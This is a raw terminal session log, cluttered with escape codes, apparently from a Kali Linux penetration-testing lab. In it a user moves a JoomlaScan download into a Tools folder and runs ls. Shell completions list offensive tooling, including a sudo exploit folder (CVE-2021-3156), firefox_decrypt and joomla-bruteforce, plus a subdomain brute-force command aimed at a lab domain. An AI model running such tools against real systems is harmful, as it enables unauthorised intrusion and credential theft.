#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[33D##[4mJ#[24m
#[J#[0;1;2mzip file#[0m
#[J#[01;31mJoomlaScan-master.zip#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32munzip#[39m #[4mJ#[24m#[K#[132C[8:24:37]#[0m#[141D##[4mJ#[4mo#[24m
#[J#[0;1;2mzip file#[0m
#[J#[01;31mJoomlaScan-master.zip#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32munzip#[39m #[4mJo#[24m#[K#[131C[8:24:37]#[0m#[140D##[4mo#[4mo#[24m
#[J#[0;1;2mzip file#[0m
#[J#[01;31mJoomlaScan-master.zip#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32munzip#[39m #[4mJoo#[24m#[K#[130C[8:24:37]#[0m#[139D##[4mo#[4mm#[24m
#[J#[0;1;2mzip file#[0m
#[J#[01;31mJoomlaScan-master.zip#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32munzip#[39m #[4mJoom#[24m#[K#[129C[8:24:37]#[0m#[138D
#[J#[A#[16C##[4mm#[4mlaScan-master.zip#[24m
#[J#[0;1;2mzip file#[0m
#[J#[01;31mJoomlaScan-master.zip#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32munzip#[39m #[4mJoomlaScan-master.zip#[24m#[K#[112C[8:24:37]#[0m#[121D#[?
1l#>#[?2004l
#[J#[A#[33C
#[0;1;2mcommand#[0m
#[0mlaudanum ld ldapdelete
lefty lesskey
libsixel-config light-locker line_send_tcp
linguist lion2john
llvm-cvtres-14 llvm-cvtres-15 llvm-cvtres-16
llvm-gsymutil-14 llvm-gsymutil-15
llvm-gsymutil-16 llvm-install-name-tool-14 llvm-install-name-tool-15
llvm-install-name-tool-16 llvm-jitlink-executor-14
llvm-jitlink-executor-15 llvm-jitlink-executor-16 llvm-lto-14
llvm-lto-15 llvm-lto-16
llvm-modextract-14 llvm-modextract-15 llvm-modextract-16
llvm-nm-14 llvm-nm-15
llvm-nm-16 llvm-otool-14 llvm-otool-15
llvm-otool-16 llvm-symbolizer-14
llvm-symbolizer-15 llvm-symbolizer-16 ln
lnstat localectl
locale-gen lofromtemplate login
loginctl lotus2john
lowriter lp lpmove
lp_solve ls
lsblk lspgpot lwp-dump
lwp-request lzegrep
lzless
#[J#[30m#[104m(MORE)#[39m#[49m#[14A#[0m#[27m#[24m#[0m
#[6C#[32ml#[39m#[90ms#[39m#[K#[137C[8:24:41]#[0m#[147D##[32ml#[32ms#[39m
#[J#[0;1;2mcommand#[0m
#[0mls lsa lsar lsassy lsattr lsblk lsb_release lscpu lsdiff
lsfd lsinitramfs lsipc lsirq lslocks lslogins lsmem lsmod lsmtd
#[Jlsns #[Jlsof #[Jlspci #[Jlspgpot #[Jlspower #[Jlstopo #[Jlstopo-no-
graphics #[Jlsusb #[J
#[3A#[0m#[27m#[24m#[0m
#[6C#[32mls#[39m#[K#[137C[8:24:41]#[0m#[146D#[?1l#>#[?2004l
#[J#[A#[8C
#]2;kali@kali:~/Downloads##]1;~/Downloads##]7;file:///home/kali/Downloads#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Downloads#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m946#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:24:43]#[148D#[?1h#=#[?
2004hm##[1m#[31mm#[0m#[39m##[1m#[31mm#[0m#[39m#[90mv Uninstaller.lnk
NIX01#[39m#[23D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mm4 makeivs-ng make_strings mariadbd mariadb-install-
db mariadb-optimize mate-calculator mawk
mcafee_epo2john medusa mflua mfplain mingle
minikerberos-ccache2kirbi minikerberos-ccacheroast miredo
mkdir mke2fs mkfs.fat mkfs.vfat mkhomedir_helper
mk_modmap mktexfmt mmcat
mmcli mmls moc mosquitto2john mount.lowntfs-3g
mount.ntfs mount.ntfs-3g mountstats
mpg123-nas mpg123-pulse mpg123-strip msfconsole msfd
msfdb msf-find_badchars msfrpc
msfrpcd msf-virustotal msgcmp msgcomm msgconv
msgfmt mt-gnu multibit2john
myisam_ftdump myisamlog myisampack mysqlcheck mysqld_safe
mysql_find_rows mysql_install_db mytop
#[J#[30m#[104m(MORE)#[39m#[49m#[9A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mm#[0m#[39m#[90mv Uninstaller.lnk
NIX01#[39m#[K#[115C[8:24:43]#[0m#[147D##[1m#[31mm#[1m#[31mv#[0m#[39m###[0m#[32mm#[0
m#[32mv#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mmv #[Jmvxattr#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m#[90m Uninstaller.lnk
NIX01#[39m#[K#[115C[8:24:43]#[0m#[146D###[32mm#[32mv#[32m #[39m
#[J#[A#[9C####[32mm#[32mv#[39m#[39m
#[J#[0;1;2mdirectory#[0m
#[01;34mJoomlaScan-master#[0m/
#[0;1;2mfile#[0m
#[0mfa-solid-900\(1\).woff2 fa-solid-900\(2\).woff2 fa-solid-900.woff2 HTB\
Academy\ Report\ Template.docx ionicons\(1\).ttf ionicons\(2\).ttf
ionicons\(3\).ttf ionicons\(4\).ttf ionicons\(5\).ttf ionicons\
(6\).ttf ionicons.ttf #[01;31mJoomlaScan-master.zip#[0m
#[JUntitled.DS_Store #[J
#[6A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m #[90mUninstaller.lnk
NIX01#[39m#[K#[115C[8:24:43]#[0m#[145D#[39mJ#[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[20D##[4mJ#[24m#[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mJoomlaScan-master#[0m/
#[0;1;2mfile#[0m
#[01;31mJoomlaScan-master.zip#[0m
#[J#[0;2m#[1mcommon substring:#[0m #[30m#[103mJoomlaScan-
master#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m
#[4mJ#[24m#[K#[135C[8:24:43]#[0m#[144D##[4mJ#[4mo#[24m#[30m#[103m#[39m#[49m#[30m#[1
03m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mJoomlaScan-master#[0m/
#[0;1;2mfile#[0m
#[01;31mJoomlaScan-master.zip#[0m
#[J#[0;2m#[1mcommon substring:#[0m #[30m#[103mJoomlaScan-
master#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m
#[4mJo#[24m#[K#[134C[8:24:43]#[0m#[143D##[4mo#[4mm#[24m####[24mJ#[24mo#[24mm#[30m#[
103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mJoomlaScan-master#[0m/
#[0;1;2mfile#[0m
#[01;31mJoomlaScan-master.zip#[0m
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mJoomlaScan#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m
Jom#[K#[133C[8:24:43]#[0m#[142Dm#[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mJoomlaScan-master#[0m/
#[0;1;2mfile#[0m
#[01;31mJoomlaScan-master.zip#[0m
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mJoomlaScan#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m Jomm#[K#[132C[8:24:43]#[0m#[141D
#[J#[A#[13C#####[4mJ#[4mo#[4mo#[4mm#[4mlaScan-master#[1m#[4m/#[0m#[24m
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m
#[4mJoomlaScan-master#[1m#[4m/#[0m#[24m#[K#[118C[8:24:43]#[0m#[127D##[0m#[4m #[24m
#[J#[A#[27C###[4mr#[24m#[24m
#[J#[0;1;2mdirectory#[0m
#[01;34mJoomlaScan-master#[0m/
#[0;1;2mfile#[0m
#[0mfa-solid-900\(1\).woff2 fa-solid-900\(2\).woff2 fa-solid-900.woff2 HTB\
Academy\ Report\ Template.docx ionicons\(1\).ttf ionicons\(2\).ttf
ionicons\(3\).ttf ionicons\(4\).ttf ionicons\(5\).ttf ionicons\
(6\).ttf ionicons.ttf #[01;31mJoomlaScan-master.zip#[0m
#[JUntitled.DS_Store #[J
#[6A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m #[4mJoomlaScan-master#[24m#[K#[119C[8:24:43]#[0m#[127D.##[4m.#[24m
#[J#[0;1;2mfile#[0m
#[0mfa-solid-900\(1\).woff2 fa-solid-900\(2\).woff2 fa-solid-900.woff2 HTB\
Academy\ Report\ Template.docx ionicons\(1\).ttf ionicons\(2\).ttf
ionicons\(3\).ttf ionicons\(4\).ttf ionicons\(5\).ttf ionicons\
(6\).ttf ionicons.ttf #[01;31mJoomlaScan-master.zip#[0m
#[JUntitled.DS_Store #[J
#[4A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m #[4mJoomlaScan-master#[24m
#[4m.#[24m#[K#[117C[8:24:43]#[0m#[126D##[4m.#[4m.#[24m
#[J#[0;1;2mdirectory#[0m
#[01;34m2024-05-02-ZAP-Report-#[0m/ #[01;34m2024-05-02-ZAP-Report-2#[0m/
#[01;34m2024-05-02-ZAP-Report-3#[0m/ #[01;34mCPTS#[0m/ #[01;34mCTF#[0m/
#[01;34mDesktop#[0m/ #[01;34mSQLiteStudio#[0m/ #[01;34mTools#[0m/ #[01;34m 模板
#[0m/
#[0;1;2mfile#[0m
#[J#[0m2024-05-02-ZAP-Report-.html
#[Jscript.log
#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m #[4mJoomlaScan-master#[24m ../J#[K#[114C[8:24:43]#[0m#[123D#
#####[4m.#[4m.#[4m/#[24m
#[J#[0;1;2mdirectory#[0m
#[01;34m2024-05-02-ZAP-Report-#[0m/ #[01;34m2024-05-02-ZAP-Report-2#[0m/
#[01;34m2024-05-02-ZAP-Report-3#[0m/ #[01;34mCPTS#[0m/ #[01;34mCTF#[0m/
#[01;34mDesktop#[0m/ #[01;34mSQLiteStudio#[0m/ #[01;34mTools#[0m/ #[01;34m 模板
#[0m/
#[0;1;2mfile#[0m
#[J#[0m2024-05-02-ZAP-Report-.html
#[Jscript.log
#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m #[4mJoomlaScan-master#[24m
#[4m../#[24m#[K#[115C[8:24:43]#[0m#[124D##[4m/#[4mT#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m #[4mJoomlaScan-master#[24m
#[4m../T#[24m#[K#[114C[8:24:43]#[0m#[123D##[4mT#[4mo#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m #[4mJoomlaScan-master#[24m
#[4m../To#[24m#[K#[113C[8:24:43]#[0m#[122D##[4mo#[4mo#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m #[4mJoomlaScan-master#[24m
#[4m../Too#[24m#[K#[112C[8:24:43]#[0m#[121D##[4mo#[4ml#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m #[4mJoomlaScan-master#[24m
#[4m../Tool#[24m#[K#[111C[8:24:43]#[0m#[120D##[4ml#[4ms#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mmv#[39m #[4mJoomlaScan-master#[24m
#[4m../Tools#[24m#[K#[110C[8:24:43]#[0m#[119D#[?1l#>#[?2004l
#[J#[A#[35C
#]2;kali@kali:~/Downloads##]1;~/Downloads##]7;file:///home/kali/Downloads#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Downloads#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m947#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:24:52]#[148D#[?1h#=#[?
2004hc##[1m#[31mc#[0m#[39m##[1m#[31mc#[0m#[39m#[90md
../Downloads#[39m#[14D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[4
9m
#[0;1;2mcommand#[0m
#[0mc89 c99 cacaclock cacaplay cacaview
cadaver calc_stat callgrind_control
cardos-tool catdoc catman cbfstool cc
ccache2john cd-create-profile cd-fix-profile
cd-iccdump cftp3 cg_annotate cg_diff cg_merge
check_forensic cherryd3 cherrytree
chgrp chkdvifont chmem chmod chpasswd
chromeos-tpm-recovery cifsiostat cisco-decrypt
ckbcomp clang++-15 clang++-16 cluster cmedb colcrt
colormgr colrm
column comm compress convert count-14 count-
15 count-16 coveralls
cp cpan cpanel_json_xs cpgr cpio
cracf2john cracklib-check cracklib-unpacker
crackmapexec create-cracklib-dict createdb createlang cron
cryptcat cryptoflex-tool cupsctl
cupsdisable cupsenable cupstestppd curl cvtsudoers cython3
#[J#[30m#[104m(MORE)#[39m#[49m#[11A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mc#[0m#[39m#[90md
../Downloads#[39m#[K#[124C[8:24:52]#[0m#[147D##[1m#[31mc#[1m#[31md#[0m#[39m###[0m#[
32mc#[0m#[32md#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mcd #[Jcd-create-profile #[Jcd-fix-profile #[Jcd-iccdump
#[Jcd-it8 #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m#[90m
../Downloads#[39m#[K#[124C[8:24:52]#[0m#[146D###[32mc#[32md#[32m #[39m
#[J#[A#[9C####[32mc#[32md#[39m#[39m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../T#[24m#[K#[132C[8:24:52]#[0m#[141D##[4mT#[4mo#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../To#[24m#[K#[131C[8:24:52]#[0m#[140D##[4mo#[4mo#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../Too#[24m#[K#[130C[8:24:52]#[0m#[139D##[4mo#[4ml#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../Tool#[24m#[K#[129C[8:24:52]#[0m#[138D##[4ml#[4ms#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../Tools#[24m#[K#[128C[8:24:52]#[0m#[137D
#[J#[A#[17C##[4ms#[1m#[4m/#[0m#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mchisel#[0m/ #[J#[01;34mCVE-2021-3156#[0m/
#[J#[01;34mfirefox_decrypt#[0m/ #[J#[01;34mjoomla-bruteforce#[0m/
#[J#[01;34mJoomlaScan-master#[0m/ #[J#[01;34mjoomlavs#[0m/ #[J#[01;34mLigolo-
ng#[0m/ #[J#[01;34mRPCScan#[0m/ #[J#[01;34msubbrute#[0m/
#[J#[01;34mwindapsearch#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m../Tools#[1m#[4m/#[0m#[24m#[K#[127C[8:24:52]#[0m#[136D##[1m#[4m/
#[1m#[4mD#[0m#[24m#[10D#[24m.#[24m.#[24m/#[24mT#[24mo#[24mo#[24ml#[24ms#[0m#[24m/
#[0m#[24mD
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mchisel#[0m/ #[J#[01;34mCVE-2021-3156#[0m/
#[J#[01;34mfirefox_decrypt#[0m/ #[J#[01;34mjoomla-bruteforce#[0m/
#[J#[01;34mJoomlaScan-master#[0m/ #[J#[01;34mjoomlavs#[0m/ #[J#[01;34mLigolo-
ng#[0m/ #[J#[01;34mRPCScan#[0m/ #[J#[01;34msubbrute#[0m/
#[J#[01;34mwindapsearch#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m ../Tools/D#[K#[126C[8:24:52]#[0m#[135Do
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mchisel#[0m/ #[J#[01;34mCVE-2021-3156#[0m/
#[J#[01;34mfirefox_decrypt#[0m/ #[J#[01;34mjoomla-bruteforce#[0m/
#[J#[01;34mJoomlaScan-master#[0m/ #[J#[01;34mjoomlavs#[0m/ #[J#[01;34mLigolo-
ng#[0m/ #[J#[01;34mRPCScan#[0m/ #[J#[01;34msubbrute#[0m/
#[J#[01;34mwindapsearch#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
../Tools/Do#[K#[125C[8:24:52]#[0m#[134Do#[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mjoomla-bruteforce#[0m/ #[01;34mJoomlaScan-master#[0m/
#[01;34mjoomlavs#[0m/
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103m../Tools/joomla#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
../Tools/Doo#[K#[124C[8:24:52]#[0m#[133Dm#[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mjoomla-bruteforce#[0m/ #[01;34mJoomlaScan-master#[0m/
#[01;34mjoomlavs#[0m/
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103m../Tools/joomla#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m ../Tools/Doom#[K#[123C[8:24:52]#[0m#[132D
#[J#[A#[22C#[13D#[4m.#[4m.#[4m/#[4mT#[4mo#[4mo#[4ml#[4ms#[4m/
#[4mj#[4mo#[4mo#[4mm#[4mla-bruteforce#[1m#[4m/#[0m#[24m
#[J#[A#[36C#
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mjoomla-bruteforce#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m../Tools/joomla-#[24m#[K#[120C[8:24:52]#[0m#[129D#[8D#[4m/#[24m#[24m #[24m
#[24m #[24m #[24m #[24m #[24m #######
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mchisel#[0m/ #[J#[01;34mCVE-2021-3156#[0m/
#[J#[01;34mfirefox_decrypt#[0m/ #[J#[01;34mjoomla-bruteforce#[0m/
#[J#[01;34mJoomlaScan-master#[0m/ #[J#[01;34mjoomlavs#[0m/ #[J#[01;34mLigolo-
ng#[0m/ #[J#[01;34mRPCScan#[0m/ #[J#[01;34msubbrute#[0m/
#[J#[01;34mwindapsearch#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../Tools/#[24m#[K#[127C[8:24:52]#[0m#[136D##[4m/#[4mJ#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mJoomlaScan-master#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../Tools/J#[24m#[K#[126C[8:24:52]#[0m#[135D##[4mJ#[4mo#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mJoomlaScan-master#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../Tools/Jo#[24m#[K#[125C[8:24:52]#[0m#[134D##[4mo#[4mo#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mJoomlaScan-master#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../Tools/Joo#[24m#[K#[124C[8:24:52]#[0m#[133D##[4mo#[4mm#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mJoomlaScan-master#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../Tools/Joom#[24m#[K#[123C[8:24:52]#[0m#[132D##[4mm#[4ml#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mJoomlaScan-master#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m../Tools/Jooml#[24m#[K#[122C[8:24:52]#[0m#[131D##[4ml#[4ma#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mJoomlaScan-master#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m../Tools/Joomla#[24m#[K#[121C[8:24:52]#[0m#[130D##[4ma#[4mS#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mJoomlaScan-master#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m../Tools/JoomlaS#[24m#[K#[120C[8:24:52]#[0m#[129D
#[J#[A#[25C##[4mS#[4mcan-master#[1m#[4m/#[0m#[24m
#[J#[A#[35C
#[J#]2;cd ../Tools/JoomlaScan-master##]1;cd##[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools/JoomlaScan-master##]1;..laScan-master##]7;file:///home/kali/
Tools/JoomlaScan-master#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/JoomlaScan-
master#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m948#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:25:03]#[148D#[?1h#=#[?
2004hl##[32ml#[39m##[32ml#[39m#[90ms#[39m##[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49
m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mlaudanum ld ldapdelete
lefty lesskey
libsixel-config light-locker line_send_tcp
linguist lion2john
llvm-cvtres-14 llvm-cvtres-15 llvm-cvtres-16
llvm-gsymutil-14 llvm-gsymutil-15
llvm-gsymutil-16 llvm-install-name-tool-14 llvm-install-name-tool-15
llvm-install-name-tool-16 llvm-jitlink-executor-14
llvm-jitlink-executor-15 llvm-jitlink-executor-16 llvm-lto-14
llvm-lto-15 llvm-lto-16
llvm-modextract-14 llvm-modextract-15 llvm-modextract-16
llvm-nm-14 llvm-nm-15
llvm-nm-16 llvm-otool-14 llvm-otool-15
llvm-otool-16 llvm-symbolizer-14
llvm-symbolizer-15 llvm-symbolizer-16 ln
lnstat localectl
locale-gen lofromtemplate login
loginctl lotus2john
lowriter lp lpmove
lp_solve ls
lsblk lspgpot lwp-dump
lwp-request lzegrep
lzless
#[J#[30m#[104m(MORE)#[39m#[49m#[14A#[0m#[27m#[24m#[0m
#[6C#[32ml#[39m#[90ms#[39m#[K#[137C[8:25:03]#[0m#[147D##[32ml#[32ms#[39m#[?1l#>#[?
2004l
#[J#[A#[8C
#]2;kali@kali:~/Tools/JoomlaScan-master##]1;..laScan-master##]7;file:///home/kali/
Tools/JoomlaScan-master#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/JoomlaScan-
master#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m949#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:25:03]#[148D#[?1h#=#[?
2004hp##[1m#[31mp#[0m#[39m##[1m#[31mp#[0m#[39m#[90mip install
bs4#[39m#[14D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mpar2create parecord paster3 pathchk
pax11publish pdfannotextractor pdf-parser pdftosrc
pdvitype pfc pg_backupcluster pg_buildext
pg_restore phar8.2 php php8.2
pic pico pidof pip
pipal piv-tool pkcon pkill
plasma-apply-colorscheme plasma-localegen-helper plasma-shutdown plasmawindowed
pltotf pod2usage podselect pon
post_fuzz pppstats printafm prosody2john
prtstat ps2pdf psfstriptable pstat
ptftopl pth-winexe ptrepack pttree
pw-dump pwhistory_helper pw-metadata pw-mididump
pwsh py2lcov py3rsa-decrypt pybabel
pylnk3 pystache python3-pasteurize python3-qr
#[J#[30m#[104m(MORE)#[39m#[49m#[9A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mp#[0m#[39m#[90mip install
bs4#[39m#[K#[124C[8:25:03]#[0m#[147D##[1m#[31mp#[1m#[31my#[0m#[39m#[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[13D#[90mthon3
subbrute.py trilocor.local --subs /usr/share/seclists/Discovery/DNS/subdomains-
top1million-20000.txt --resolvers new_resolvers.txt#[39m#[136D
#[J#[0;1;2mcommand#[0m
#[0mpy2lcov py3clean py3compile
py3rsa-decrypt py3rsa-encrypt py3rsa-keygen
py3rsa-priv2pub py3rsa-sign py3rsa-verify
py3versions pybabel pybabel-python3
pyclean pycompile pydoc
pydoc2 pydoc2.7 pydoc3
pydoc3.11 pydoc3.12 pyenv_prompt_info
pyfiglet pygettext2 pygettext2.7
pygettext3 pygettext3.11 pygettext3.12
pygmentex pygmentize pyhtmlizer3
pyi-archive_viewer pyi-bindepend pyi-grab_version
pyi-makespec pyinstaller pyi-set_version
pylnk3 pylupdate5 pylupdate6
pyppeteer-install pypykatz pyrcc5
pyserial-miniterm pyserial-ports py-sneakers
pyspnego-parse pystache pystache-test
python python2 python2.7
python2.7-config python3 python3.11
python3.11-config python3.12 python3.12-config
python3-config python3-futurize python3-pasteurize
python3-qr python-argcomplete-check-easy-install-script python-dotenv
python-faraday pythran pythran-config
#[Jpyuic5 #[Jpyuic6
#[Jpyversions #[Jpyvnc.py #[Jpywerview #[J
#[13A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mpy#[0m#[39m#[90mthon3 subbrute.py trilocor.local --subs
/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --resolvers
new_resolvers.txt#[39m#[K#[1C[8:25:03]#[0m#[146D###[1m#[31mp#[1m#[31my#[1m#[31mt#[0
m#[39m##[1m#[31mt#[1m#[31mh#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[0mpython python2 python2.7 python2.7-config python3
python3.11 python3.11-config
python3.12 python3.12-config python3-config python3-futurize python3-
pasteurize python3-qr python-argcomplete-check-easy-install-script
#[Jpython-dotenv #[Jpython-faraday #[Jpythran #[Jpythran-config #[J
#[4A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mpyth#[0m#[39m#[90mon3 subbrute.py trilocor.local --subs
/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --resolvers
new_resolvers.txt#[39m#[K#[1C[8:25:03]#[0m#[144D##[1m#[31mh#[1m#[31mo#[0m#[39m#[30m
#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mcommand#[0m
#[0mpython python2 python2.7 python2.7-config python3
python3.11 python3.11-config
python3.12 python3.12-config python3-config python3-futurize python3-
pasteurize python3-qr python-argcomplete-check-easy-install-script
python-dotenv python-faraday
#[J#[0;2m#[1mcommon substring:#[0m
#[30m#[103mpython#[39m#[49m#[5A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mpytho#[0m#[39m#[90mn3 subbrute.py trilocor.local --subs
/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --resolvers
new_resolvers.txt#[39m#[K#[1C[8:25:03]#[0m#[143D##[1m#[31mo#[1m#[31mn#[0m#[39m#####
##[0m#[32mp#[0m#[32my#[0m#[32mt#[0m#[32mh#[0m#[32mo#[0m#[32mn#[39m
#[J#[0;1;2mcommand#[0m
#[0mpython python2 python2.7 python2.7-config python3
python3.11 python3.11-config
python3.12 python3.12-config python3-config python3-futurize python3-
pasteurize python3-qr python-argcomplete-check-easy-install-script
#[Jpython-dotenv #[Jpython-faraday #[J
#[4A#[0m#[27m#[24m#[0m
